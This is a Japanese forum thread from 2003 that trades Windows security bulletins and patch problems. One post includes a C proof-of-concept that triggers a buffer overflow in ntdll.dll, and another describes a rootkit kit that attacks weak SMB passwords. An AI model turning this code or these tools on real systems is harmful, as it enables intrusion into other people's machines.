◆MSサーバーに4種類の新たなセキュリティ・ホール

http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030529/1/


今回は一度に4つの大盤振る舞い!!
398名無しさん@お腹いっぱい。:03/05/29 19:57 ID:C5nK6r5d

Windows XP セキュリティ修正プログラム : Windows カーネル メッセージ処理でバッファがオーバーランすると、特権の昇格が発生する
http://microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=9F81E615-3DEC-4A4B-826A-4E0FEAB42323
399名無しさん@お腹いっぱい。:03/05/30 09:20 ID:zt4GfWQV
しばらく来ない間にこのスレも荒れたね。
811493と言うパッチについて詳しく知ってる人いませんか?
400ウイルス君:03/05/30 12:37 ID:RFZm0neU
ウイルスチェックしてみたずら

http://lounge.dip.jp/~yoshinoya_off/up/data/Viruscheck.jpg

401あぼーん:あぼーん
あぼーん
402名無しさん@お腹いっぱい。:03/05/30 19:04 ID:pcR6hDtm
>>396
使ってます。でも公開した日付ってどこで見れるのかわからないんです。
403名無しさん@お腹いっぱい。:03/05/30 19:44 ID:???
>>399
811493は怖いので様子見です。
過去に何人も悲鳴をあげているようですし

windows update失敗したらあげるスレ 3
http://pc2.2ch.net/test/read.cgi/win/1040217939/
404あぼーん:あぼーん
あぼーん
405あぼーん:あぼーん
あぼーん
406あぼーん:あぼーん
あぼーん
407あぼーん:あぼーん
あぼーん
408名無しさん@お腹いっぱい。:03/05/30 22:30 ID:???
>>402
あぁ、更新履歴を(ry

2003/5/29 : このセキュリティ情報ページを更新し、パフォーマンス問題を修正する改訂版の Windows XP Service Pack 1 用の修正プログラムが利用可能となったことをお知らせしました
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms03-013.asp


http://jp.fujitsu.com/itj/
409あぼーん:あぼーん
あぼーん
410名無しさん@お腹いっぱい。:03/05/30 23:29 ID:pcR6hDtm
>>408
あ、恐れ入ります
411窓板住人 ◆winDOwS0aE :03/05/31 14:07 ID:???
[FIX] RPC の不具合により ASP/COM+ アプリケーションでスレッドが応答を停止する
http://support.microsoft.com/default.aspx?scid=kb;ja;814119
この問題による影響があるのは、Microsoft Windows 2000 Service Pack 3 (SP3) です。

現象
プロセス間の COM 呼び出しを実行する ASP アプリケーションがリモート プロシージャ
コール (RPC) の不具合の影響を受ける可能性があり、そのためにスレッドが応答を停止
(ハング) することがあります。

この不具合は、以下の Windows Update の重要な更新を含む、複数の SP3 以降の
修正プログラム内に存在します。
331953 [MS03-010] RPC エンドポイント マッパーの問題により、サービス拒否の攻撃が実行される

また、要求があった場合にのみ Microsoft Support から提供している修正プログラムの中にも、
この不具合の存在するものが複数あります。 (略)
412窓板住人 ◆winDOwS0aE :03/05/31 14:09 ID:???
>411
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/03.html#20030328_MS03-010
2003.05.12 追記:
この patch はサポートからしか入手できないようだ。

2003.05.28 追記:
日本語 OS 用の patch はまだ存在しないようだ。必要な人はサポートに問いあわせよう。
413窓板住人 ◆winDOwS0aE :03/05/31 14:14 ID:???
マイクロソフト サポート技術情報 - 821817
ActiveX の実行ダイアログを表示すると 他アプリケーションへの切り替え表示ができなくなる
http://support.microsoft.com/default.aspx?scid=kb;ja;821817

Internet Explorer では、[インターネットオプション] - [セキュリティ] タブ内の設定により、
ActiveX の実行に対して警告を表示することができます。
このダイアログは、「ActiveX コントロールやプラグインなどのソフトウェアを実行できるようにしますか?」
のメッセージが表示され、実行するかどうかについての確認が行われます。
このダイアログを表示して ActiveX を実行した後に、アプリケーションを切り替えを行った場合、
切り替えたアプリケーションが最前面に表示されれず、Internet Explorer が最前面に表示され
続ける場合があります。
414窓板住人 ◆winDOwS0aE :03/05/31 14:40 ID:???
Windows Media サービスの ISAPI エクステンションの問題により、
サービス拒否が起こる (817772) (MS03-019)
http://www.microsoft.com/japan/technet/security/bulletin/MS03-019.asp
このセキュリティ情報の対象となるユーザー :
MicrosoftR Windows NT 4.0 Server または Microsoft Windows 2000 Server を
ご使用のシステム管理者

http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/05.html#20030529
Microsoft によると、MS03-019 は「警告」「これはサービス拒否の脆弱性です」に
なっていますが、 eEye の Marc Maiffret 氏によると exploit 書ける (実証済み)
だそうなのでご注意あれ。
415窓板住人 ◆winDOwS0aE :03/05/31 14:51 ID:h4PnXw0q
http://www.microsoft.com/japan/technet/security/bulletin/MS03-018.asp
Internet Information Service 用の累積的な修正プログラム (811114) (MS03-018)
416窓板住人 ◆winDOwS0aE :03/05/31 14:55 ID:h4PnXw0q
818043 Windows XP 用推奨修正プログラムの適用後にネットワークに接続できない
http://www.microsoft.com/japan/support/sokuho/default.asp
Windows Update サイトより 818043 Windows XP 用推奨修正プログラムをリリースした後、
この修正プログラムを適用したコンピュータで、ネットワークに接続できなくなる問題が発生
することが確認されました。
本件につきましては、現在弊社にて調査中ですが 818043 の修正プログラムを適用後、
お使いのコンピュータよりネットワークに接続できない問題が発生した場合には、下記の手順で
修正プログラムをアンインストールすることで以前の構成に戻すことができます。

1. [スタート] メニューより、[コントロールパネル] を開きます。
2. [プログラムの追加と削除] を起動して一覧より、現在インストールされているプログラムの一覧
をご確認ください。
3. 該当する修正プログラム [Windows XP Hotfix (SP2) Q818043] が一覧に表示されている場合
には、[削除] を選択してアンインストールしてください。

ご迷惑をお掛けしましたことを、心よりお詫び申し上げます。
417仕様書無しさん:03/05/31 15:04 ID:mRj7eluD
418名無しさん@お腹いっぱい。:03/05/31 15:21 ID:+PVF146l
助けて下さい

私の掲示板に山崎渉が現れ荒らします。
私が消しても消してもどんどん書き込まれます。
どなたか助けてはいただけないでしょうか。
にちゃんねらーの力を私は信じています。

このスレが一番荒らされています↓
http://jbbs.shitaraba.com/computer/bbs/read.cgi?BBS=3011&KEY=1030724122
[Windows XP] ntdll.dll内の関数で起こるバッファオーバーフローによる脆弱性
http://opera.rainyblue.org/modules/cjaycontent/index.php?id=7
#include <windows.h>#include <stdio.h>
void vuln_func(wchar_t *long_string)
{wchar_t *tmp_wc;
wchar_t buffer[0x100*2];printf("ready ... \n");
//// about GetFullPathName// http://msdn.microsoft.com/library/en-us/fileio/base/getfullpathname.asp
//// RtlGetFullPathName_U is called from GetFullPathNameW.
//GetFullPathNameW(long_string, 0x100, buffer, &tmp_wc);
// No return here.printf("returned\n");
}const int vuln_length = 0x10010;// 0xFFFF & 0x10010 == 0x10
int main(){wchar_t *p = new wchar_t[vuln_length + 32];
memset(p, 0x90, vuln_length*sizeof(wchar_t));
p[vuln_length] = 0;vuln_func(p);
delete[] p;return 0;}
420名無しさん@お腹いっぱい。:03/06/03 02:55 ID:bjyu9mP+
● 新日本主義思想 (Neo Japanism)


新日本主義思想(Neo Japanism)とは、
いまNET上の若者の間で広まっている、
日本を軍事力、経済力、共に強い国にするという思想である。

景気回復や世界をテロやテロ支援国家などから守り
世界平和を実現するために、軍事力大幅強化や徴兵制の復活、
集団的自衛権の保有、スパイ防止法の制定、
軍需産業の復活等を目標と掲げている例が多い。

そして個々人の思想によって解釈が異なることが
最大の特徴とされる新しい時代の言論である。
421名無しさん@お腹いっぱい。:03/06/05 12:30 ID:YQB0kQ6l
MS03-020: Internet Explorer 用の累積的な修正プログラム (818529)
http://www.microsoft.com/japan/technet/security/bulletin/MS03-020ov.asp
422あぼーん:あぼーん
あぼーん
423名無しさん@お腹いっぱい。:03/06/05 13:30 ID:???
■■ガンダムパソコン限定再発売■■
  ガンダムパソコン ”CHARモデル”
「機動戦士ガンダム」より、待望の”赤いNOTE PC”が再び登場!詳細はこちらから!
他では手に入らない!”完全受注生産品”となります。
●第2回受付中!

   販売価格:\198,000円(税別)

http://click.linksynergy.com/fs-bin/click?id=dKVflFQ0Dy4&offerid=43069.10000034&type=4&subid=0

 ご注文締め切り日 6月30日(月)午後3時予定
424名無しさん@お腹いっぱい。:03/06/05 16:58 ID:???

http://honyaku.naver.co.jp/ktj.html?css_url=http://kr.dailynews.yahoo.com/headlines/so/20030605/gd/gd200306051114214317.html

蓮華写真後遺症に苦しむという "あ...."という IDのネチズンは "身を掻くようになって理由のなく寒気だって及ぶ具合"と言いながら "どんな人がこのように猟奇的な組写真を国内インターネットに移して来たのか怨しい"と吐露した.

Dサイト側は "精神的被害を被ったネチズンが多い位今度事件をサイバー犯罪捜査隊に捜査依頼する計画"と明らかにした.

425名無しさん@お腹いっぱい。:03/06/08 21:42 ID:???
426名無しさん@お腹いっぱい。:03/06/08 23:54 ID:???
427名無しさん@お腹いっぱい。:03/06/09 00:16 ID:???
428名無しさん@お腹いっぱい。:03/06/09 00:18 ID:6v6+2kDO
429窓板住人 ◆winDOwS0aE :03/06/09 05:03 ID:???
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/06.html#20030606_MS03-020
IE 5.01 / 5.5 / 6 に新たに 2 つの欠陥。

1. object タグの type 属性の処理に欠陥があり、buffer overflow が発生する。
このため、悪意ある web サイトや HTML メールによって任意のコードを実行させられる恐れがある。
参照: Internet Explorer Object Type Property Overflow (eEye)。 CVE: CAN-2003-0344
2. ファイルのダウンロードダイアログの処理に欠陥があり、 frame / iframe を大量に記述することで、
任意のコマンドを誰でも簡単に強制実行させることができてしまう。
参照: Flooding Internet Explorer 6.0.2800 (6.x?) security zones !。CVE: CAN-2003-0309

patch があるので適用すればよい。ただし、手元の Windows XP SP1 + IE 6.0 SP1 で確認した限りでは、
この patch を適用しても、Flooding Internet Explorer 6.0.2800 (6.x?) security zones ! のデモプログラム
http://www.malware.com/forceframe.html を試すと、コマンドこそ実行されないものの、
IE はクラッシュしてしまう。

マイクロソフト サポート技術情報 - 818529
[IE] [MS03-020] Internet Explorer 用の累積的な修正プログラム (2003 年 6 月)
http://support.microsoft.com/default.aspx?scid=kb;ja;818529
なお、Microsoft Windows Server 2003はこの累積パッチの対象です。
430窓板住人 ◆winDOwS0aE :03/06/09 05:05 ID:???
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/06.html#20030606_4260
■ 4.2.60スキャンエンジンリリースに関するご案内
(NAI, 2003.06.06)
最新のスキャンエンジン 4.2.40 において、ごく稀 (報告件数: 全世界で 1 件) にだが、
Windows のレジストリ全てを削除してしまう場合があるという。スキャンエンジン 4.2.40 を
使っていても、影響を受けるアプリと受けないアプリがあるので注意。
(一覧はリンク先を参照してください)

影響を受けるアプリでスキャンエンジン 4.2.40 を使用している場合は、この問題を修正した
スキャンエンジン 4.2.60 が登場するので、これに入れかえる。 2003.06.26 に登場する
Weekly SuperDAT で 4.2.60 にアップグレードするのが推奨のようだ。
431名無しさん@お腹いっぱい。:03/06/11 20:21 ID:AnIu0Z4A
>>429
また例によって「小マシ」になった程度か・・。
IE3.0xのときも確かリンクファイル絡みでこんなことがあったな
432あぼーん:あぼーん
あぼーん
433名無しさん@お腹いっぱい。:03/06/11 20:27 ID:gKDRAMle
434あぼーん:あぼーん
あぼーん
435あぼーん:あぼーん
あぼーん
436名無しさん@お腹いっぱい。:03/06/11 20:40 ID:AnIu0Z4A
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030610/1/
「Microsoft VMをアンインストールする手段を提供する」――マイクロソフト
437名無しさん@お腹いっぱい。:03/06/11 22:52 ID:xa7I30bA
会社のサーバーに入ったメールって簡単に
発信者がワレるものなんですか?

プロバイダーってすぐ個人情報出すんですか?
438あぼーん:あぼーん
あぼーん
439名無しさん@お腹いっぱい。:03/06/11 23:30 ID:???
お忙しいとこスミマセン。
ちょいと書き込みさせて下さい。

【YBB】モデム利用者の個人情報が流動化に
http://pc3.2ch.net/test/read.cgi/isp/1055262847/l50
ユーザーにレンタル提供しているADSLモデムや無線LANカードなどの「接続機器レンタル規約」を
6月24日から改定する。

現在、レンタルモデムの所有者はソフトバンクBBとなっているが、モデムの証券化を行なうことで、
レンタルモデムの所有者が変わることになる。
改定された規約では、モデムの新所有者に対し、モデム利用者の個人情報を開示することを可能にするなど、
流動化に向けた条項が追加された。また、会員が利用中のモデムの所有権移転を拒否できることも明確に記された。

これじゃあ、セキュリティー以前の問題だな。
440窓板住人 ◆winDOwS0aE :03/06/15 00:32 ID:45anCLiQ
マイクロソフト の Securing Windows 2000 Server ソリューション
http://www.microsoft.com/japan/technet/security/prodtech/windows/secwin2k/default.asp

Microsoft におけるコンピュータの脆弱性の管理
http://www.microsoft.com/japan/technet/itsolutions/msit/security/mscomvul.asp

インシデント対応 : Microsoft 社内におけるセキュリティ管理
http://www.microsoft.com/japan/technet/itsolutions/msit/security/msirsec.asp

Microsoft におけるネットワーク境界のセキュリティ
http://www.microsoft.com/japan/technet/itsolutions/msit/security/twcomp.asp

提供方法や時期については未定だが,Microsoft VMをアンインストールするため
のツールを提供する準備がある
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030610/1/
441Windows 2k rootkit:03/06/17 00:48 ID:???
Windows 2k rootkit
http://www.st.ryukoku.ac.jp/~kjm/security/memo/ より
Windows 2k rootkit incident, files zipped for your pleasure.
と フォロー (incidents ML)。Hacker Defender rootkit をぐぐって
みたら Apple Tree - SMB/CIFS Auditor (theblog.hypermart.net)
というのをみつけました。445/tcp からヨワヨワパスワードを攻撃
して、成功したら rootkit やら vnc やら keylogger やらを植えつ
けられる tool のようです。 log cleaner もついてますね。

Windows 2k rootkit incident, files zipped for your pleasure.
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/incidents/2003.06/msg00100.html
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/incidents/2003.06/msg00105.html

Apple Tree - SMB/CIFS Auditor
http://theblog.hypermart.net/thurstonia/appletree.shtml
442Windows 2k rootkit :03/06/17 00:50 ID:???
ノートン大先生の分析結果
beenhaxxored.zip
ファイル名: mfxp_tlist_.exe 結果: デベロッパーノートを参照してください。
ファイル名: mfxp_sperm.exe 結果: デベロッパーノートを参照してください。
mfxp_tlist_.exe contains no malicious code
although it can be used for malicious purposes
and it represents a security risk. It is safe to delete this file.

mfxp_sperm.exe contains no malicious code
although it can be used for malicious purposes
and it represents a security risk. It is safe to delete this file.
The files submitted do not contain malicious material.
They do represent a security risk, so you should delete these files.
このファイルは悪質なものではありませんが、あなたのコンピュータ上で
知らないうちに動作しています。このファイルを削除することをお勧めします。
443名無しさん@お腹いっぱい。:03/06/17 09:13 ID:Yf4fCesv
マイクロソフト、自社製品の脆弱性をやさしく説明する Web サイト
http://headlines.yahoo.co.jp/hl?a=20030616-00000016-inet-sci

○「絵でみるセキュリティ情報」
http://www.microsoft.com/japan/security/security_bulletins/
444名無しさん@お腹いっぱい。:03/06/17 09:15 ID:???
■マナー、ルール無用のDQN犯珍ファン! 不祥事続出! 逝ってよし!
03.05.23 阪神ファンの男、無免許で飲酒運転で逮捕(10年前から免許取り消し処分中)
http://www.daily.co.jp/society/2003/05/24/083176.shtml
03.06.11 阪神戦で催涙ガス? 51人手当て2人入院
http://www.nikkansports.com/ns/baseball/f-bb-tp0-030611-0033.html
03.06.15 阪神ファンの男、警備中の警察官に暴行、首に軽傷を負わせ公務執行妨害で逮捕
http://www.zakzak.co.jp/top/t-2003_06/1t2003061615.html

●おまけ
85.05.23 阪神ファン、福井線審にチェーン投げ顔面に & 阪神電車止める
85.06.30 阪神ファン、試合中止に怒りグランド乱入しリリーフカー奪う
http://www.nikkansports.com/osaka/otr/p-otr-030613-07.html
    
445あぼーん:あぼーん
あぼーん
446あぼーん:あぼーん
あぼーん
447あぼーん:あぼーん
あぼーん
448名無しさん@お腹いっぱい。:03/06/18 00:48 ID:okKiQ29o
Win2000SP4、7月にも日本語版配布開始らしいな。
http://pcweb.mycom.co.jp/news/2003/06/16/20.html
449あぼーん:あぼーん
あぼーん
450晒しhage:03/06/19 00:39 ID:???
451名無しさん@お腹いっぱい。:03/06/23 09:41 ID:???
○IEの新しい累積パッチにはいくつかの注意点
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030617/1/
452名無しさん@お腹いっぱい。:03/06/26 08:57 ID:???
重要な更新きたね
453名無しさん@お腹いっぱい。:03/06/26 10:01 ID:???

「MS03-021: Windows Media Player の問題により、メディア ライブラリがアクセスされる (819639)」

http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS03-021ov.asp
454名無しさん@お腹いっぱい。:03/06/26 12:38 ID:???
455窓板住人 ◆winDOwS0aE :03/06/26 18:58 ID:OztB3Bx1
ウィルス対策各社、「SOBIG.E」ワームへの注意呼びかけ
http://headlines.yahoo.co.jp/hl?a=20030626-00000015-inet-sci
456窓板住人 ◆winDOwS0aE :03/06/26 19:00 ID:OztB3Bx1
IEブラウザに新たな欠陥:米マイクロソフトは「調査中」
http://japan.cnet.com/news/ent/story/0,2000047623,20057501,00.htm
457あぼーん:あぼーん
あぼーん
458名無しさん@お腹いっぱい。:03/06/26 23:06 ID:???

★Windows 2000 Serverにセキュリティ・ホール
http://biztech.nikkeibp.co.jp/wcs/j/comp/254250i
459PC超超初心:03/06/27 11:01 ID:8hS6I88M
恐れ多くて聞きづらいのですが、
MSNメッセンジャーを入れたのですが、毎日頻繁にメッセンジャーサービスとかいって
半角カタカナの羅列みたいなメッセージがくるんです。
ネットゲーム中とかもくるので非常に困ってます。アンインストールしてもくるんですTT
どうすれば対処できるのでしょうか?ちなみに会社のPCだと来ません。
460名無しさん@お腹いっぱい。:03/06/27 11:07 ID:QENUEHhT
>>459
キシュツ
本来はネットワーク管理者用がメッセージを送るのに使われるのを、
悪用されてるだけ。
MSNメッセンジャーと多分関係ない。
らしいでつ (´・ω・`)
461PC超超初心:03/06/27 11:22 ID:8hS6I88M
そうなんですか...
ご迷惑ついでに伺いたいのですが、対処法はあるのですか?
462名無しさん@お腹いっぱい。:03/06/27 11:29 ID:QENUEHhT
463PC?´?´???S:03/06/27 11:45 ID:8hS6I88M
hmmなるほど...ありがとうございます。

つまりファイヤーウォールをつかわないと対処できないと言うことですか...
(;´Д`)
464田口:03/06/27 13:21 ID:???
ばかばっかりね プ
465田口:03/06/27 13:22 ID:DNoP5zv+
ぐわぁぁーーーっ 削除願い ↑ 
メアドが勝手に 管理人さん消してくださいペコペコ
466名無しさん@お腹いっぱい。:03/06/27 13:32 ID:xMjqY/gC
ajtmgr
@
pdx.ne.jp
467名無しさん@お腹いっぱい。:03/06/27 14:07 ID:NMZm6PRM
会社のPCがBBOYつーのくらったらしいけどどうよ
468あぼーん:あぼーん
あぼーん
469名無しさん@お腹いっぱい。:03/06/27 16:21 ID:cAbhPQ7D
ここですか?ばかばっかりの田口さんは?
470名無しさん@お腹いっぱい。:03/06/27 18:36 ID:oKMfUfiD
811493 XPのセキュリティ問題の修正プログラムをインストールしたあとに
updateサイトのインストールの更新をしてみると同じ811493のプログラムがあるんです。

なんでなのかよくわかりません。解る方教えてください。
471名無しさん@お腹いっぱい。:03/06/27 18:40 ID:???
気にするな
472名無しさん@お腹いっぱい。:03/06/27 18:43 ID:???
>>471
インストールの更新履歴には「成功」とあるんですが。
自動更新にも同じプログラムがインストールの準備できました。と、お知らせしてくるんです。

なんでだろう。
473名無しさん@お腹いっぱい。:03/06/27 19:01 ID:???
>>463
コンピュータの管理からサービス開いて「Messenger」の項目を手動にしとけ
474名無しさん@お腹いっぱい。:03/06/27 23:23 ID:???
■IEブラウザに新たな欠陥:米マイクロソフトは「調査中」
http://japan.cnet.com/news/ent/story/0,2000047623,20057501,00.htm
475名無しさん@お腹いっぱい。:03/06/28 23:42 ID:???
http://ringonoki.net/tool/kaizou/samurize.html(林檎の木の紹介)
このSamurizeっていうアプリの、ウィルス情報表示スクリプト便利ですよ。


【サムライマスター】Samurize Part8【暇人】
<a onClick=
476名無しさん@お腹いっぱい。:03/06/28 23:43 ID:???
スマソ途中で切れた

【サムライマスター】Samurize Part8【暇人】
http://pc2.2ch.net/test/read.cgi/software/1055494635/
スクリプト配布所
http://www.geocities.co.jp/SiliconValley/6705/script.html
477名無しさん@お腹いっぱい。:03/07/01 23:56 ID:???
複数のメールソフトに不適切なセキュリティゾーンが適用される欠陥
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2003/07.html#20030701_mail
478ぼるじょあX ◆OFFflgM7Cw :03/07/03 23:43 ID:Y5qUWW68
479名無しさん@お腹いっぱい:03/07/04 01:22 ID:lZ1u24tT
ここのサイトどうよ?俺たちバカに
してない?
http://island.gaiax.com/home/tuyosi/main
480名無しさん@お腹いっぱい。:03/07/04 11:55 ID:???

。。ハニタッノワ。「 6ニ?、ヒ・マ・テ・ォ。シ、ホスクテトケカキ筅ルケ。?
http://www.hotwired.co.jp/news/news/technology/story/20030703301.html
481名無しさん@お腹いっぱい。:03/07/04 14:02 ID:???
>>480 はEUC
★★米政府、 6日にハッカーの集団攻撃を警告★★
482あぼーん:あぼーん
あぼーん
483名無しさん@お腹いっぱい。:03/07/07 12:03 ID:???
>>481
何も起こらなかったね。

<内心期待していた漏れ>
484窓板住人 ◆winDOwS0aE :03/07/07 19:04 ID:???
日本語版の公開間近,Windows 2000 SP4を解説する (公開済みだけど)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030701/1/

SP4を適用する場合の注意点
 過去のサービス・パック同様,Windows 2000 SP4を適用すると問題が発生する場合がある。
原稿執筆時点(2003年6月29日現在)では,「ブートができなくなる」などの大きな問題は発生
していないものの,気になる問題がいくつか報告されている。最新情報は「813432 - Release
Notes for Windows 2000 Service Pack 4」に記載されている。同ページは今後更新されることが
予想されるので,できるだけ頻繁にチェックしたい。
(略)
 同ページの「その他(Other)」にある「820101 - Frequently Asked Questions About
the Microsoft VM and Windows 2000 Service Pack 4」も気になるタイトルである。(略)
ドキュメントには,以下のような情報が記載されている。
(1)Microsoft VM は,Windows 2000 SP4によってインストールされないし,更新も削除もされない
(2)Microsoft VM を構成するファイルは,Windows 2000 SP4を適用すると,Windows File Protection
(WFP)によって保護されなくなる
(3)Microsoft VM がインストールされている Windows 2000 SP4 適用後のシステムにおいては,
Microsoft VM のセキュリティ更新(パッチ)を自分で適用し続けることはとてもよい考え
(very good idea)である。Windows Update の利用により,Microsoft VMを更新し続けることができる (略)

SP4に含まれないセキュリティ・パッチ
(略)
 つまり,Microsoft VMがインストールされていて,なおかつ「MS03-011」を適用していない場合には,
「MS03-011」を適用する必要がある。ただし,注意点がある。(略)
このページに置かれているパッチは,Windows 2000 SP2/SP3用だからだ。 (略)
485login:Penguin:03/07/08 19:16 ID:???
Win2k/XPでIEのアドレスバーに「C:\AUX」と入力するとIEが固まる。
リンク先の記事ではXP+IE6としか書いてないが、Win2k+IE5、5.5、6.0でも再現する。
ttp://lists.netsys.com/pipermail/full-disclosure/2003-July/010964.html
486名無しさん@お腹いっぱい。:03/07/09 19:36 ID:???
エンタープライズ:Internet Explorer 6が「c:\aux」でフリーズするバグ
http://www.zdnet.co.jp/enterprise/0307/08/epn16.html
http://www.st.ryukoku.ac.jp/~kjm/security/memo/#20030708_aux (セキュリティmemo)

これも張っとく。一応
すぐにでもブラクラ化されそうで、怖い怖い
487記者風野郎 ◆keO78YJbfs :03/07/10 08:02 ID:???
広範なWindowsプラットフォームに「緊急」の脆弱性
http://www.zdnet.co.jp/enterprise/0307/10/epn03.html
488名無しさん@お腹いっぱい。:03/07/11 00:46 ID:???
★Windows Server 2003 などに3種類の深刻なセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030710/3/

★だからマイクロソフトは嫌われる?-セキュリティ担当者の呆れた弁解
http://japan.cnet.com/news/ent/story/0,2000047623,20059757,00.htm
489窓板住人 ◆winDOwS0aE :03/07/11 07:14 ID:???
この修正を含む予定のサービス パック :
この問題に対する修正プログラムは Windows 2000 Service Pack 4 に含まれています。
この問題に対する修正プログラムは Windows XP Service Pack 2 に含まれる予定です。

Windows のバッファ オーバーランによりデータが破損する (817606) (MS03-024)
http://www.microsoft.com/japan/technet/security/bulletin/MS03-024.asp
登録日 : 2003/7/10 更新日 : 2003/7/10
脆弱性の影響 : 攻撃者の任意のコードが実行される
推奨する対応策 : 管理者は、この修正プログラムをインストールすることを検討してください。
絵でみるセキュリティ情報 : イラストを交えたセキュリティ情報は次のサイトをご覧ください。
http://www.microsoft.com/japan/security/security_bulletins/ms03-024e.asp
影響を受けるソフトウェア :
 Microsoft Windows NT Server 4.0
 Microsoft Windows NT Server 4.0, Terminal Server Edition
 Microsoft Windows 2000
 Windows XP Professional
影響を受けないソフトウェア :Microsoft Windows Server 2003

深刻度 :対象プラットフォーム全て 重要

修正プログラム :
(リンク先省略、詳細は上記リンク先をご覧下さい。WinNT4TSE以外はWIndowsUpdateからも適用可能です。)

この修正プログラムはWindows NT Server 4.0 Service Pack 6a 、Windows NT Server, Terminal Server Edition
Service Pack 6 、Windows 2000 Service Pack 3 、Windows XP または Service Pack 1 を実行しているコンピュータに
インストールすることができます。
490窓板住人 ◆winDOwS0aE :03/07/11 07:16 ID:???

対象プラットフォーム :
Windows 2000 Service Pack 3 を実行しているコンピュータにインストールすることができます。
さらに、この問題に対する修正は Service Pack 4 に含まれています。

ユーティリティ マネージャによる Windows メッセージ処理の問題により、権限が昇格する (822679) (MS03-025)
http://www.microsoft.com/japan/technet/security/bulletin/MS03-025.asp
登録日 : 2003/7/10 更新日 : 2003/7/10
最大深刻度 : 重要
推奨する対応策 : お客様は早期に修正プログラムをインストールして下さい。
絵でみるセキュリティ情報 : イラストを交えたセキュリティ情報は次のサイトをご覧ください。
http://www.microsoft.com/japan/security/security_bulletins/ms03-025e.asp

影響を受けるソフトウェア : Microsoft Windows 2000
深刻度 : Windows 2000 重要
修正プログラム :
Microsoft Windows 2000:
http://microsoft.com/downloads/details.aspx?FamilyId=D415A4AC-E13A-4E8A-BE25-85E7DF686F61&displaylang=ja
Windows Update からインストールすることもできます。
491名無しさん@お腹いっぱい。:03/07/11 16:20 ID:???
                                           ( ´Д` )
492名無しさん@お腹いっぱい。:03/07/11 18:23 ID:j8hVDZRe
                                           ( ´D` )
493あぼーん:あぼーん
あぼーん
494窓板住人 ◆winDOwS0aE :03/07/11 20:45 ID:???
>>487-488 がらみです。

HTML コンバータのバッファ オーバーランにより、コードが実行される (823559) (MS03-023)
http://www.microsoft.com/japan/technet/security/bulletin/MS03-023.asp
登録日 : 2003/7/10 更新日 : 2003/7/11

脆弱性の影響 : 攻撃者の選択したコードが実行される可能性があります
最大深刻度 : 緊急
推奨する対応策 : システム管理者は直ちに修正プログラムを適用して下さい。
影響を受けるソフトウェア :
Microsoft Windows 98
Microsoft Windows 98 Second Edition
Microsoft Windows Me
Microsoft Windows NT 4.0 Server
Microsoft Windows NT 4.0, Terminal Server Edition
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows Server 2003

深刻度 :
Windows Server 2003 警告
その他の影響を受けるバージョンのWindows 緊急

修正プログラムに関する追加情報 :
対象プラットフォーム :
Windows 98、Window 98 Second Edition、Windows Me、Windows NT 4.0 Service Pack 6a、
Windows NT 4.0, Terminal Server Edition Service Pack 6、Windows 2000 Service Pack 3
または Service Pack 4、Windows XP または Windows XP Service Pack 1、Windows Server 2003
を実行しているシステムにインストールすることができます。
495あぼーん:あぼーん
あぼーん
496名無しさん@お腹いっぱい。:03/07/12 13:46 ID:sbs2Zh9p
あげ
497名無しさん@お腹いっぱい。:03/07/13 01:55 ID:???
愛想が尽きた MS  
498名無しさん@お腹いっぱい。:03/07/13 15:16 ID:???
98使ってる人はアップデートできたのかな?
サポートが6月いっぱいで終わるようなこと聞いてたんだけど。
499名無しさん@お腹いっぱい。:03/07/13 18:50 ID:bPB6tySi
田口さんがんがれ!
500名無しさん@お腹いっぱい。:03/07/13 19:54 ID:???
500(σ^▽^)σゲッツ!!
501名無しさん@お腹いっぱい。:03/07/14 07:58 ID:???
★「虚偽の件名を付けたスパム・メールが今年前半で50%以上増加」
http://biztech.nikkeibp.co.jp/wcs/j/inet/256610
502あぼーん:あぼーん
あぼーん
503あぼーん:あぼーん
あぼーん
504あぼーん:あぼーん
あぼーん
505あぼーん:あぼーん
あぼーん
506あぼーん:あぼーん
あぼーん
507名無しさん@お腹いっぱい。:03/07/14 16:07 ID:???
ここはホントにセキュリティ情報スレなのか?
508名無しさん@お腹いっぱい。:03/07/14 18:05 ID:???
広告等、ごみがあるが忍耐ぢゃ
509名無しさん@お腹いっぱい。:03/07/14 20:42 ID:???
>>498
98S.E. だけどアップデートできたみたい。
510山崎 渉:03/07/15 13:02 ID:???

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄
511名無しさん@お腹いっぱい。:03/07/15 13:31 ID:GCsymHH2
山崎の野郎、まだやってるのか。
512あぼーん:あぼーん
あぼーん
513あぼーん:あぼーん
あぼーん
514窓板住人 ◆winDOwS0aE :03/07/16 05:32 ID:???
ウイルスバスターオンラインスキャンのActiveX コンポーネントの
メモリバッファオーバーフローを原因とする脆弱性について
http://www.trendmicro.co.jp/hcall/overflow.asp
515窓板住人 ◆winDOwS0aE :03/07/16 05:35 ID:???
トレンドマイクロ方面: パターンファイル650番以降をダウンロードできない
(トレンドマイクロ, 2003.07.14)
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/07.html#20030714_trend

トレンドマイクロ方面で、パターンファイル 650 以降をダウンロード・インストールできない
という状況が発生することがある模様。最新のセキュリティパッチを適用すればよいみたい。
516窓板住人 ◆winDOwS0aE :03/07/16 05:37 ID:???
SNS Advisory No.65
Windows 2000 ShellExecute() API Let Applications to Cause Buffer Overflow
http://www.lac.co.jp/security/intelligence/SNSAdvisory/65.html

概要:
Windows 2000 の ShellExecute() API には、Buffer Overflow を発生させてしまう問題があります。
対策:
